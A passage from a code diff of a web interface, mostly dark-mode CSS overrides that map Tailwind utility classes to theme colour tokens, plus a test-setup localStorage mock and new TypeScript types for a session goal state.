+}
+
+.dark .from-red-50,
+.dark .from-rose-50 {
+  --tw-gradient-from: rgb(220 38 38 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(220 38 38 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .from-purple-100 { /* declarations are identical to the .from-purple-50 rule above */
+  --tw-gradient-from: rgb(124 58 237 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(124 58 237 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .to-purple-100 { /* declaration is identical to the .to-purple-50 rule above */
+  --tw-gradient-to: rgb(124 58 237 / 0.16) var(--tw-gradient-to-position);
+}
+
+.dark .to-red-50,
+.dark .to-red-100,
+.dark .to-rose-100 {
+  --tw-gradient-to: rgb(220 38 38 / 0.14) var(--tw-gradient-to-position);
+}
+
+.dark .border-gray-100,
+.dark .border-gray-50,
+.dark .border-zinc-100,
+.dark .border-slate-100,
+.dark .border-white,
+.dark .border-white\/80,
+.dark .border-white\/70,
+.dark .border-white\/60,
+.dark .border-gray-200,
+.dark .border-zinc-200,
+.dark .border-slate-200,
+.dark .border-gray-300,
+.dark .border-zinc-300,
+.dark .border-slate-300,
+.dark .border-gray-200\/80,
+.dark .border-zinc-200\/80,
+.dark .border-zinc-200\/90,
+.dark .border-zinc-200\/60,
+.dark .border-zinc-200\/70,
+.dark .border-l-gray-300,
+.dark .border-l-zinc-200,
+.dark .border-t-white,
+.dark .border-t-zinc-200,
+.dark .divide-gray-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-gray-50 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-zinc-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-gray-200 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-zinc-200 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-slate-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-blue-100 > :not([hidden]) ~ :not([hidden]) {
+  border-color: var(--flocks-dark-border) !important; /* light borders and divide-* separators -> default border token; sets all four sides even for border-l-* and border-t-* */
+}
+
+.dark .border-gray-400,
+.dark .border-gray-500,
+.dark .border-gray-600,
+.dark .border-zinc-400,
+.dark .border-slate-400,
+.dark .border-slate-500,
+.dark .border-slate-600,
+.dark .focus\:border-gray-300:focus,
+.dark .focus\:border-zinc-300:focus,
+.dark .focus\:border-slate-400:focus,
+.dark .focus-within\:border-zinc-300:focus-within,
+.dark .hover\:border-gray-300:hover,
+.dark .hover\:border-gray-200:hover,
+.dark .hover\:border-zinc-300:hover,
+.dark .hover\:border-gray-400:hover,
+.dark .hover\:border-zinc-400:hover,
+.dark .hover\:border-slate-300:hover,
+.dark .hover\:border-slate-400:hover {
+  border-color: var(--flocks-dark-border-strong) !important; /* mid-gray borders and neutral hover/focus borders -> strong border token */
+}
+
+.dark .dark\:border-zinc-950,
+.dark .dark\:border-zinc-900,
+.dark .dark\:border-zinc-800,
+.dark .dark\:border-gray-950,
+.dark .dark\:border-gray-900,
+.dark .dark\:border-gray-800,
+.dark .dark\:border-slate-950,
+.dark .dark\:border-slate-900,
+.dark .dark\:border-slate-800,
+.dark .dark\:divide-zinc-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-zinc-800 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-gray-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-gray-800 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-slate-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-slate-800 > :not([hidden]) ~ :not([hidden]) {
+  border-color: var(--flocks-dark-border) !important; /* 800-950 `dark:` borders and dividers -> default border token */
+}
+
+.dark .dark\:border-zinc-700,
+.dark .dark\:border-zinc-600,
+.dark .dark\:border-gray-700,
+.dark .dark\:border-gray-600,
+.dark .dark\:border-slate-700,
+.dark .dark\:border-slate-600,
+.dark .dark\:hover\:border-zinc-700:hover,
+.dark .dark\:hover\:border-zinc-600:hover,
+.dark .dark\:hover\:border-gray-700:hover,
+.dark .dark\:hover\:border-gray-600:hover {
+  border-color: var(--flocks-dark-border-strong) !important; /* 600-700 `dark:` borders -> strong border token */
+}
+
+.dark .hover\:border-blue-300:hover,
+.dark .hover\:border-blue-200:hover,
+.dark .hover\:border-blue-400:hover,
+.dark .hover\:border-purple-300:hover,
+.dark .hover\:border-purple-400:hover {
+  border-color: rgb(96 165 250 / 0.42); /* NOTE(review): purple hover borders resolve to this blue value - confirm intended */
+}
+
+.dark .hover\:border-sky-200:hover {
+  border-color: rgb(59 130 246 / 0.34);
+}
+
+.dark .hover\:border-amber-400:hover,
+.dark .hover\:border-amber-200:hover,
+.dark .hover\:border-orange-400:hover,
+.dark .hover\:border-yellow-400:hover {
+  border-color: rgb(245 158 11 / 0.42);
+}
+
+.dark .hover\:border-emerald-200:hover,
+.dark .hover\:border-emerald-300:hover,
+.dark .hover\:border-emerald-400:hover {
+  border-color: rgb(52 211 153 / 0.4);
+}
+
+.dark .hover\:border-red-200:hover,
+.dark .hover\:border-red-300:hover,
+.dark .hover\:border-rose-200:hover {
+  border-color: rgb(244 63 94 / 0.4);
+}
+
+.dark .hover\:border-violet-200:hover {
+  border-color: rgb(139 92 246 / 0.34); /* violet, unlike purple above, keeps a violet hue */
+}
+
+.dark .border-sky-100,
+.dark .border-sky-200,
+.dark .border-sky-300,
+.dark .border-sky-400,
+.dark .border-sky-600,
+.dark .border-blue-100,
+.dark .border-blue-200,
+.dark .border-blue-300,
+.dark .border-cyan-400, /* NOTE(review): cyan-400 is grouped with blue, while cyan-100..300 sit in the green rule below */
+.dark .focus\:border-blue-300:focus,
+.dark .focus\:border-blue-400:focus,
+.dark .focus\:border-blue-500:focus {
+  border-color: rgb(83 155 245 / 0.46);
+}
+
+.dark .border-amber-100,
+.dark .border-amber-200,
+.dark .border-amber-300,
+.dark .border-amber-400,
+.dark .border-yellow-200,
+.dark .border-yellow-500,
+.dark .border-orange-100,
+.dark .border-orange-200,
+.dark .border-orange-300,
+.dark .border-orange-400 {
+  border-color: rgb(245 158 11 / 0.34);
+}
+
+.dark .border-red-100,
+.dark .border-red-200,
+.dark .border-red-300,
+.dark .border-red-400\/40,
+.dark .border-red-600,
+.dark .border-l-red-400,
+.dark .border-l-red-500,
+.dark .border-t-red-600,
+.dark .focus\:border-red-400:focus,
+.dark .focus\:border-red-500:focus,
+.dark .focus-within\:border-red-500:focus-within,
+.dark .border-rose-100,
+.dark .border-rose-200,
+.dark .border-rose-300,
+.dark .border-pink-100,
+.dark .border-pink-200,
+.dark .border-pink-300,
+.dark .border-pink-400,
+.dark .border-pink-500 {
+  border-color: rgb(244 63 94 / 0.32); /* red, rose and pink share one rose value; sets all sides even for border-l-* and border-t-* */
+}
+
+.dark .border-green-100,
+.dark .border-green-200,
+.dark .border-green-300,
+.dark .border-green-400,
+.dark .border-green-500,
+.dark .border-l-green-400,
+.dark .border-l-green-500,
+.dark .border-emerald-100,
+.dark .border-emerald-200,
+.dark .border-emerald-300,
+.dark .border-emerald-400,
+.dark .border-lime-400,
+.dark .border-teal-100,
+.dark .border-teal-200,
+.dark .border-teal-300,
+.dark .border-teal-400,
+.dark .border-teal-500,
+.dark .border-cyan-100,
+.dark .border-cyan-200,
+.dark .border-cyan-300 {
+  border-color: rgb(34 197 94 / 0.3); /* green, emerald, lime, teal and cyan-100..300 share one green value */
+}
+
+.dark .border-purple-100,
+.dark .border-purple-200,
+.dark .border-purple-300,
+.dark .border-purple-500,
+.dark .border-purple-600,
+.dark .focus\:border-purple-500:focus,
+.dark .border-violet-100,
+.dark .border-violet-200,
+.dark .border-violet-300,
+.dark .border-violet-400,
+.dark .border-violet-500,
+.dark .border-fuchsia-400,
+.dark .border-indigo-100,
+.dark .border-indigo-200,
+.dark .border-indigo-300,
+.dark .border-indigo-400 {
+  border-color: rgb(139 92 246 / 0.34);
+}
+
+.dark .dark\:border-zinc-900, /* NOTE(review): all four selectors also appear in an earlier rule of this stylesheet that sets the same token with !important */
+.dark .dark\:border-zinc-800,
+.dark .dark\:border-gray-800,
+.dark .dark\:border-slate-800 {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .dark\:border-zinc-700, /* NOTE(review): the first four selectors repeat an earlier !important rule; only the focus and focus-within ones are new here */
+.dark .dark\:border-gray-700,
+.dark .dark\:border-slate-700,
+.dark .dark\:hover\:border-zinc-700:hover,
+.dark .dark\:focus\:border-zinc-700:focus,
+.dark .dark\:focus-within\:border-zinc-700:focus-within {
+  border-color: var(--flocks-dark-border-strong);
+}
+
+.dark .dark\:ring-zinc-800,
+.dark .dark\:focus\:ring-zinc-800:focus,
+.dark .dark\:focus-within\:ring-zinc-800:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72); /* only the ring color variable is changed, not the ring width */
+}
+
+.dark .dark\:border-sky-500\/35,
+.dark .dark\:border-sky-500\/40,
+.dark .dark\:border-sky-500\/50,
+.dark .dark\:border-blue-500\/35,
+.dark .dark\:border-blue-500\/40,
+.dark .dark\:border-blue-500\/50 {
+  border-color: rgb(83 155 245 / 0.46); /* one alpha for every listed opacity suffix */
+}
+
+.dark .dark\:border-amber-500\/30,
+.dark .dark\:border-amber-500\/35,
+.dark .dark\:border-amber-500\/40,
+.dark .dark\:border-orange-500\/35,
+.dark .dark\:border-orange-500\/40 {
+  border-color: rgb(245 158 11 / 0.34);
+}
+
+.dark .dark\:border-red-500\/30,
+.dark .dark\:border-red-500\/35,
+.dark .dark\:border-red-500\/40,
+.dark .dark\:border-rose-500\/30,
+.dark .dark\:border-rose-500\/35,
+.dark .dark\:border-rose-500\/40 {
+  border-color: rgb(244 63 94 / 0.32);
+}
+
+.dark .text-gray-950,
+.dark .text-zinc-950,
+.dark .text-slate-950,
+.dark .text-gray-900,
+.dark .text-zinc-900,
+.dark .text-slate-900,
+.dark .text-gray-800,
+.dark .text-zinc-800,
+.dark .text-slate-800 {
+  color: var(--flocks-dark-text); /* 800-950 neutral text -> primary text token */
+}
+
+.dark .text-gray-700,
+.dark .text-zinc-700,
+.dark .text-slate-700,
+.dark .text-gray-600,
+.dark .text-zinc-600,
+.dark .text-slate-600 {
+  color: var(--flocks-dark-text-muted); /* 600-700 neutral text -> muted token */
+}
+
+.dark .text-gray-500,
+.dark .text-zinc-500,
+.dark .text-slate-500,
+.dark .text-gray-400,
+.dark .text-zinc-400,
+.dark .text-slate-400,
+.dark .text-gray-300,
+.dark .text-zinc-300,
+.dark .text-slate-300 {
+  color: var(--flocks-dark-text-subtle); /* 300-500 neutral text -> subtle token */
+}
+
+.dark .hover\:text-gray-900:hover,
+.dark .hover\:text-zinc-900:hover,
+.dark .hover\:text-slate-900:hover,
+.dark .hover\:text-gray-800:hover,
+.dark .hover\:text-zinc-800:hover,
+.dark .hover\:text-slate-800:hover,
+.dark .hover\:text-gray-700:hover,
+.dark .hover\:text-zinc-700:hover,
+.dark .hover\:text-slate-700:hover,
+.dark .hover\:text-gray-600:hover,
+.dark .hover\:text-zinc-600:hover,
+.dark .hover\:text-slate-600:hover {
+  color: #ffffff; /* every neutral hover text shade becomes pure white */
+}
+
+.dark .text-sky-500,
+.dark .text-sky-600,
+.dark .text-sky-700,
+.dark .text-sky-800,
+.dark .text-blue-500,
+.dark .text-blue-600,
+.dark .text-blue-700,
+.dark .text-blue-800 {
+  color: #6cb6ff; /* single light blue for all listed sky and blue shades */
+}
+
+.dark .text-amber-500,
+.dark .text-amber-600,
+.dark .text-amber-700,
+.dark .text-amber-700\/80,
+.dark .text-amber-800,
+.dark .text-amber-950,
+.dark .text-yellow-500,
+.dark .text-yellow-600,
+.dark .text-yellow-700,
+.dark .text-yellow-800,
+.dark .text-orange-500,
+.dark .text-orange-600,
+.dark .text-orange-700,
+.dark .text-orange-800,
+.dark .text-orange-400 {
+  color: #fbbf24; /* opaque value, so the /80 opacity variant loses its transparency */
+}
+
+.dark .text-red-300,
+.dark .text-red-400,
+.dark .text-red-500,
+.dark .text-red-600,
+.dark .text-red-700,
+.dark .text-rose-400,
+.dark .text-rose-500,
+.dark .text-rose-600,
+.dark .text-rose-700,
+.dark .text-pink-500,
+.dark .text-pink-600,
+.dark .text-pink-700 {
+  color: #fda4af;
+}
+
+.dark .text-green-500,
+.dark .text-green-600,
+.dark .text-green-700,
+.dark .text-emerald-200,
+.dark .text-emerald-300,
+.dark .text-emerald-500,
+.dark .text-emerald-600,
+.dark .text-emerald-700,
+.dark .text-emerald-800,
+.dark .text-emerald-900,
+.dark .text-lime-700,
+.dark .text-teal-500,
+.dark .text-teal-600,
+.dark .text-teal-700,
+.dark .text-cyan-500,
+.dark .text-cyan-600,
+.dark .text-cyan-700 {
+  color: #86efac; /* green, emerald, lime, teal and cyan text share one light green */
+}
+
+.dark .text-purple-500,
+.dark .text-purple-600,
+.dark .text-purple-700,
+.dark .text-purple-800,
+.dark .text-violet-500,
+.dark .text-violet-600,
+.dark .text-violet-700,
+.dark .text-violet-800,
+.dark .text-fuchsia-700,
+.dark .text-indigo-500,
+.dark .text-indigo-600,
+.dark .text-indigo-700 {
+  color: #c4b5fd;
+}
+
+.dark .bg-emerald-50.text-emerald-900, /* compound and descendant selectors: emerald text on or inside an emerald-50 surface */
+.dark .bg-emerald-50.text-emerald-950,
+.dark .bg-emerald-50 .text-emerald-900,
+.dark .bg-emerald-50 .text-emerald-950,
+.dark .from-emerald-50 .text-emerald-950 {
+  color: #d1fae5; /* extra class raises specificity above the plain .text-emerald-900 rule earlier in this section */
+}
+
+.dark .dark\:text-zinc-50,
+.dark .dark\:text-zinc-100,
+.dark .dark\:text-gray-50,
+.dark .dark\:text-gray-100,
+.dark .dark\:text-slate-50,
+.dark .dark\:text-slate-100 {
+  color: var(--flocks-dark-text); /* 50-100 `dark:` text -> primary text token */
+}
+
+.dark .dark\:text-zinc-200,
+.dark .dark\:text-zinc-300,
+.dark .dark\:text-gray-200,
+.dark .dark\:text-gray-300,
+.dark .dark\:text-slate-200,
+.dark .dark\:text-slate-300 {
+  color: var(--flocks-dark-text-muted); /* 200-300 -> muted token */
+}
+
+.dark .dark\:text-zinc-400,
+.dark .dark\:text-zinc-500,
+.dark .dark\:text-zinc-600,
+.dark .dark\:text-gray-400,
+.dark .dark\:text-gray-500,
+.dark .dark\:text-gray-600,
+.dark .dark\:text-slate-400,
+.dark .dark\:text-slate-500,
+.dark .dark\:text-slate-600 {
+  color: var(--flocks-dark-text-subtle); /* 400-600 -> subtle token */
+}
+
+.dark .dark\:hover\:text-zinc-50:hover,
+.dark .dark\:hover\:text-zinc-100:hover,
+.dark .dark\:hover\:text-zinc-200:hover,
+.dark .dark\:hover\:text-gray-50:hover,
+.dark .dark\:hover\:text-gray-100:hover,
+.dark .dark\:hover\:text-gray-200:hover {
+  color: #ffffff;
+}
+
+.dark .hover\:text-sky-900:hover,
+.dark .hover\:text-blue-800:hover,
+.dark .hover\:text-blue-900:hover,
+.dark .hover\:text-amber-900:hover,
+.dark .hover\:text-orange-900:hover,
+.dark .hover\:text-red-600:hover,
+.dark .hover\:text-red-500:hover,
+.dark .hover\:text-red-700:hover,
+.dark .hover\:text-red-800:hover,
+.dark .hover\:text-red-900:hover,
+.dark .hover\:text-green-700:hover,
+.dark .hover\:text-green-800:hover,
+.dark .hover\:text-green-900:hover,
+.dark .hover\:text-emerald-700:hover,
+.dark .hover\:text-emerald-900:hover,
+.dark .hover\:text-purple-700:hover,
+.dark .hover\:text-violet-700:hover,
+.dark .hover\:text-teal-700:hover,
+.dark .hover\:text-cyan-700:hover,
+.dark .hover\:text-indigo-700:hover,
+.dark .hover\:text-pink-700:hover,
+.dark .hover\:text-rose-500:hover,
+.dark .hover\:text-rose-600:hover,
+.dark .hover\:text-rose-700:hover {
+  color: #ffffff; /* tinted hover text drops its hue and becomes white */
+}
+
+.dark .group:hover .group-hover\:text-gray-500,
+.dark .group:hover .group-hover\:text-zinc-400,
+.dark .group:hover .group-hover\:text-zinc-500,
+.dark .group:hover .group-hover\:text-zinc-800,
+.dark .group:hover .group-hover\:text-slate-700,
+.dark .group:hover .group-hover\:text-zinc-900,
+.dark .group\/sec:hover .group-hover\/sec\:text-zinc-900,
+.dark .group\/name:hover .group-hover\/name\:text-slate-700,
+.dark .group\/name:hover .group-hover\/name\:text-blue-700,
+.dark .group\/name:hover .group-hover\/name\:text-purple-700 {
+  color: #ffffff; /* covers plain .group plus the named groups group/sec and group/name */
+}
+
+.dark .group:hover .dark\:group-hover\:text-zinc-100,
+.dark .group:hover .dark\:group-hover\:text-zinc-300 {
+  color: #ffffff;
+}
+
+.dark .group:hover .group-hover\:text-rose-400,
+.dark .group:hover .group-hover\:text-sky-400,
+.dark .group:hover .group-hover\:text-violet-400,
+.dark .group:hover .group-hover\:text-emerald-400,
+.dark .group:hover .group-hover\:text-blue-400,
+.dark .group:hover .group-hover\:text-blue-500,
+.dark .group:hover .group-hover\:text-amber-500 {
+  color: var(--flocks-dark-text); /* tinted group-hover text uses the primary text token rather than #ffffff */
+}
+
+.dark .shadow,
+.dark .shadow-sm,
+.dark .shadow-md,
+.dark .shadow-lg,
+.dark .shadow-xl,
+.dark .shadow-2xl {
+  --tw-shadow-color: rgb(0 0 0 / 0.28);
+  box-shadow: var(--flocks-dark-shadow); /* every shadow size gets the same box-shadow token (declared outside this chunk) */
+}
+
+.dark .dark\:shadow-black\/10,
+.dark .dark\:shadow-black\/20,
+.dark .dark\:shadow-black\/30,
+.dark .dark\:shadow-black\/40 {
+  --tw-shadow-color: rgb(28 33 40 / 0.32);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .hover\:shadow:hover,
+.dark .hover\:shadow-sm:hover,
+.dark .hover\:shadow-md:hover,
+.dark .hover\:shadow-lg:hover {
+  --tw-shadow-color: rgb(0 0 0 / 0.32);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .shadow-none,
+.dark .hover\:shadow-none:hover {
+  box-shadow: none; /* explicit opt-out, placed after the shadow rules above */
+}
+
+.dark .ring-white,
+.dark .ring-gray-100,
+.dark .ring-zinc-100,
+.dark .ring-slate-100,
+.dark .ring-gray-200,
+.dark .ring-zinc-200,
+.dark .ring-slate-200, /* NOTE(review): .ring-slate-200 is listed again in a later rule of this section with a different value; the later one wins at equal specificity */
+.dark .dark\:ring-zinc-950,
+.dark .dark\:ring-gray-950,
+.dark .dark\:ring-slate-950 {
+  --tw-ring-color: var(--flocks-dark-border);
+}
+
+.dark .focus\:ring-gray-100:focus,
+.dark .focus\:ring-zinc-100:focus,
+.dark .focus\:ring-slate-100:focus,
+.dark .focus\:ring-gray-200:focus,
+.dark .focus\:ring-zinc-200:focus,
+.dark .focus\:ring-slate-200:focus,
+.dark .focus-within\:ring-gray-100:focus-within,
+.dark .focus-within\:ring-zinc-100:focus-within,
+.dark .focus-within\:ring-slate-100:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .focus\:ring-slate-400:focus,
+.dark .focus\:ring-slate-300:focus,
+.dark .focus\:ring-gray-400:focus,
+.dark .focus\:ring-zinc-400:focus,
+.dark .focus\:ring-red-300:focus,
+.dark .focus\:ring-red-400:focus,
+.dark .focus\:ring-red-400\/50:focus,
+.dark .focus\:ring-red-500:focus,
+.dark .focus\:ring-blue-100:focus,
+.dark .focus\:ring-blue-300:focus,
+.dark .focus\:ring-blue-400:focus,
+.dark .focus\:ring-green-300:focus,
+.dark .focus\:ring-green-400:focus,
+.dark .focus\:ring-purple-100:focus,
+.dark .focus\:ring-purple-500:focus,
+.dark .focus\:ring-violet-500:focus,
+.dark .focus\:ring-pink-500:focus,
+.dark .focus\:ring-teal-500:focus,
+.dark .focus\:ring-orange-400:focus,
+.dark .focus\:ring-orange-500:focus,
+.dark .focus\:ring-emerald-100:focus,
+.dark .focus-within\:ring-red-100:focus-within,
+.dark .focus-within\:ring-red-500:focus-within,
+.dark .focus-within\:ring-zinc-300:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72); /* same value as the previous rule: tinted focus rings all become this neutral gray */
+}
+
+.dark .ring-red-200,
+.dark .ring-red-300,
+.dark .ring-red-400,
+.dark .ring-slate-200,
+.dark .ring-slate-400,
+.dark .ring-green-400,
+.dark .ring-yellow-400,
+.dark .ring-orange-400,
+.dark .ring-purple-400,
+.dark .ring-violet-400,
+.dark .ring-pink-400,
+.dark .ring-teal-400 {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .ring-offset-1,
+.dark .ring-offset-2,
+.dark .focus\:ring-offset-0:focus,
+.dark .focus\:ring-offset-1:focus {
+  --tw-ring-offset-color: var(--flocks-dark-app); /* ring offset gap takes the app background token */
+}
+
+.dark .focus-visible\:outline-sky-500:focus-visible {
+  outline-color: rgb(83 155 245 / 0.78);
+}
+
+.dark input, /* element selectors: applies to every input, textarea and select under .dark */
+.dark textarea,
+.dark select {
+  background-color: var(--flocks-dark-surface);
+  border-color: var(--flocks-dark-border-strong);
+  color: var(--flocks-dark-text);
+}
+
+.dark textarea.bg-transparent { /* opt-out: transparent textareas keep no fill, border color or shadow */
+  background-color: transparent !important;
+  border-color: transparent !important;
+  box-shadow: none !important;
+}
+
+.dark input::placeholder,
+.dark textarea::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1; /* fixes placeholder opacity at 1 so the token color is used as-is */
+}
+
+.dark .placeholder-gray-300::placeholder,
+.dark .placeholder-zinc-300::placeholder,
+.dark .placeholder-slate-300::placeholder,
+.dark .placeholder-gray-400::placeholder,
+.dark .placeholder-zinc-400::placeholder,
+.dark .placeholder-slate-400::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1;
+}
+
+.dark .dark\:placeholder\:text-zinc-500::placeholder,
+.dark .dark\:placeholder\:text-zinc-600::placeholder,
+.dark .dark\:placeholder\:text-gray-500::placeholder,
+.dark .dark\:placeholder\:text-gray-600::placeholder {
+  color: var(--flocks-dark-placeholder) !important;
+  opacity: 1;
+}
+
+.dark input:focus,
+.dark textarea:focus,
+.dark select:focus {
+  border-color: var(--flocks-dark-border-strong);
+  box-shadow: 0 0 0 3px rgb(83 155 245 / 0.12); /* 3px spread-only shadow drawn around the focused control */
+}
+
+.dark textarea.bg-transparent:focus { /* keeps the transparent-textarea opt-out in effect while focused */
+  border-color: transparent !important;
+  box-shadow: none !important;
+}
+
+.dark * { /* standard scrollbar-color property: thumb color first, then track color */
+  scrollbar-color: #5a6573 #252c35 !important;
+}
+
+.dark *::-webkit-scrollbar { /* vendor-prefixed scrollbar pseudo-elements, styled with the same two colors */
+  width: 10px;
+  height: 10px;
+}
+
+.dark *::-webkit-scrollbar-track {
+  background: #252c35;
+}
+
+.dark *::-webkit-scrollbar-thumb {
+  background: #5a6573;
+  border: 2px solid #252c35; /* border uses the track color */
+  border-radius: 999px;
+}
+
+.dark *::-webkit-scrollbar-thumb:hover {
+  background: #687584;
+}
+
+.dark table {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark thead,
+.dark .prose thead {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark tbody tr:hover,
+.dark .hover\:bg-gray-50:hover, /* NOTE(review): this selector and the next are already covered by an earlier rule in this stylesheet with the same value */
+.dark .hover\:bg-zinc-50:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark code,
+.dark .prose code {
+  background-color: var(--flocks-dark-surface-raised);
+  color: var(--flocks-dark-text);
+}
+
+.dark pre,
+.dark .prose pre {
+  background-color: #20262d; /* same literal as --tw-prose-pre-bg in the .dark .prose rule */
+  border: 1px solid var(--flocks-dark-border);
+  color: var(--flocks-dark-text);
+}
+
+.dark .prose { /* sets the --tw-prose-* custom properties from the theme tokens, plus a direct color */
+  --tw-prose-body: var(--flocks-dark-text-muted);
+  --tw-prose-headings: var(--flocks-dark-text);
+  --tw-prose-lead: var(--flocks-dark-text-muted);
+  --tw-prose-links: #6cb6ff;
+  --tw-prose-bold: var(--flocks-dark-text);
+  --tw-prose-counters: var(--flocks-dark-text-subtle);
+  --tw-prose-bullets: var(--flocks-dark-text-subtle);
+  --tw-prose-hr: var(--flocks-dark-border);
+  --tw-prose-quotes: var(--flocks-dark-text);
+  --tw-prose-quote-borders: var(--flocks-dark-border-strong);
+  --tw-prose-captions: var(--flocks-dark-text-subtle);
+  --tw-prose-code: var(--flocks-dark-text);
+  --tw-prose-pre-code: var(--flocks-dark-text);
+  --tw-prose-pre-bg: #20262d;
+  --tw-prose-th-borders: var(--flocks-dark-border-strong);
+  --tw-prose-td-borders: var(--flocks-dark-border);
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose h1, /* explicit element rules follow, in addition to the custom properties above */
+.dark .prose h2,
+.dark .prose h3,
+.dark .prose h4,
+.dark .prose strong {
+  color: var(--flocks-dark-text);
+}
+
+.dark .prose h2,
+.dark .prose hr,
+.dark .prose th,
+.dark .prose td,
+.dark .prose details,
+.dark .prose details[open] summary {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .prose th,
+.dark .prose td {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose tr:nth-child(even) td, /* fills the cells of even-numbered rows */
+.dark .prose details summary {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark .prose details summary {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .prose details summary:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .prose a {
+  color: #6cb6ff; /* same literal as --tw-prose-links */
+}
+
+.dark .react-flow, /* overrides for elements carrying react-flow__* class names */
+.dark .react-flow__renderer,
+.dark .react-flow__pane {
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__node {
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__attribution {
+  background-color: rgb(48 56 66 / 0.86);
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .react-flow__controls {
+  border: 1px solid var(--flocks-dark-border);
+  background-color: var(--flocks-dark-surface);
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.dark .react-flow__controls-button {
+  border-bottom-color: var(--flocks-dark-border);
+  background-color: var(--flocks-dark-surface);
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .react-flow__controls-button:hover {
+  background-color: var(--flocks-dark-surface-raised);
+  color: var(--flocks-dark-text);
+}
+
+.dark .react-flow__controls-button svg {
+  fill: currentColor; /* icon fill follows the button's text color, including the hover color above */
+}
+
+.dark .react-flow__minimap {
+  border: 1px solid var(--flocks-dark-border) !important;
+  background-color: var(--flocks-dark-surface) !important;
+  box-shadow: var(--flocks-dark-shadow);
+}
+
+.device-room-actions-fade { /* not scoped to .dark: defines the default fade color and the gradient itself */
+  --device-room-action-fade: #f4f4f5;
+  background: linear-gradient(to right, transparent, var(--device-room-action-fade) 35%); /* transparent on the left, reaching the fade color at 35% */
+}
+
+.device-room-actions-fade[data-selected='true'] {
+  --device-room-action-fade: #eff6ff; /* selected state only swaps the variable; the gradient rule is reused */
+}
+
+.dark .device-room-actions-fade {
+  --device-room-action-fade: var(--flocks-dark-surface-soft);
+}
+
+.dark .device-room-actions-fade[data-selected='true'] {
+  --device-room-action-fade: rgb(37 99 235 / 0.16); /* translucent end color, unlike the opaque literals in the rules outside .dark */
+}
diff --git a/webui/src/test/setup.ts b/webui/src/test/setup.ts
index dcd0df72f..b014e0cb2 100644
--- a/webui/src/test/setup.ts
+++ b/webui/src/test/setup.ts
@@ -2,6 +2,43 @@ import '@testing-library/jest-dom/vitest';
 import { cleanup } from '@testing-library/react';
 import { afterEach } from 'vitest';
 
+function createStorageMock(): Storage { // builds an in-memory object exposing the Storage members: length, clear, getItem, key, removeItem, setItem
+  let store: Record<string, string> = Object.create(null); // null prototype: keys such as "__proto__" are stored as data instead of hitting the inherited setter
+
+  return {
+    get length() {
+      return Object.keys(store).length;
+    },
+    clear() {
+      store = Object.create(null); // replace the map wholesale, again without a prototype
+    },
+    getItem(key: string) {
+      return Object.prototype.hasOwnProperty.call(store, key) ? store[key] : null; // null for keys that were never set
+    },
+    key(index: number) {
+      return Object.keys(store)[index] ?? null; // out-of-range index yields null
+    },
+    removeItem(key: string) {
+      delete store[key];
+    },
+    setItem(key: string, value: string) {
+      store[key] = String(value); // values are coerced to strings before being stored
+    },
+  };
+}
+
+// Install the in-memory mock only when globalThis.localStorage is missing or has no clear() function.
+// The same mock instance is exposed on both globalThis and window.
+if (typeof globalThis.localStorage?.clear !== 'function') {
+  const fallbackStorage = createStorageMock();
+  const descriptor = {
+    value: fallbackStorage,
+    configurable: true, // leaves the property redefinable afterwards
+  };
+  Object.defineProperty(globalThis, 'localStorage', descriptor);
+  Object.defineProperty(window, 'localStorage', descriptor);
+}
+
 afterEach(() => {
   cleanup();
 });
@@ -15,4 +52,4 @@ global.ResizeObserver = class ResizeObserver {
 global.MutationObserver = class MutationObserver {
   observe() {}
   disconnect() {}
-};
\ No newline at end of file
+};
diff --git a/webui/src/types/index.ts b/webui/src/types/index.ts
index e7d7b6d03..eb584929d 100644
--- a/webui/src/types/index.ts
+++ b/webui/src/types/index.ts
@@ -25,6 +25,13 @@ export interface Session {
   canWrite?: boolean;
   canDelete?: boolean;
   isShared?: boolean;
+  goal?: SessionGoalState | null;
+}
+
+export interface SessionGoalState { // shape of the optional `goal` field on Session
+  status: 'active' | 'completed' | 'blocked' | 'paused';
+  objective: string;
+  reason?: string | null; // NOTE(review): presumably explains the current status — confirm against the API
 }
 
 export interface SessionTime {
@@ -109,6 +116,7 @@ export interface MessagePart {
   text?: string;
   synthetic?: boolean;
